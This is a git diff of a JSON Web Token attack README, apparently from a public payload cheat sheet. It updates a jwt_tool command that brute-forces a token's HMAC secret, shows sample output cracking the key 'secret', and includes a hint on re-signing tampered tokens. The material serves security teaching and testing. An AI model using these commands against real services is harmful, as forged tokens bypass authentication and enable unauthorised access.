diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index e186299..b7915a2 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -188,20 +188,23 @@ First, bruteforce the "secret" key used to compute the signature. ```powershell git clone https://github.com/ticarpi/jwt_tool -python2.7 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI /tmp/wordlist +python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C -Token header values: -[+] alg = HS256 -[+] typ = JWT + \ \ \ \ \ \ + \__ | | \ |\__ __| \__ __| | + | | \ | | | \ \ | + | \ | | | __ \ __ \ | + \ | _ | | | | | | | | + | | / \ | | | | | | | | +\ | / \ | | |\ |\ | | + \______/ \__/ \__| \__| \__| \______/ \______/ \__| + Version 2.2.2 \______| @ticarpi -Token payload values: -[+] sub = 1234567890 -[+] role = user -[+] iat = 1516239022 +Original JWT: -File loaded: /tmp/wordlist -Testing 5 passwords... [+] secret is the CORRECT key! +You can tamper/fuzz the token contents (-T/-I) and sign it using: +python3 jwt_tool.py [options here] -S HS256 -p "secret" ``` Then edit the field inside the JSON Web Token. @@ -279,4 +282,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) - [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) -- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass) \ No newline at end of file +- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass)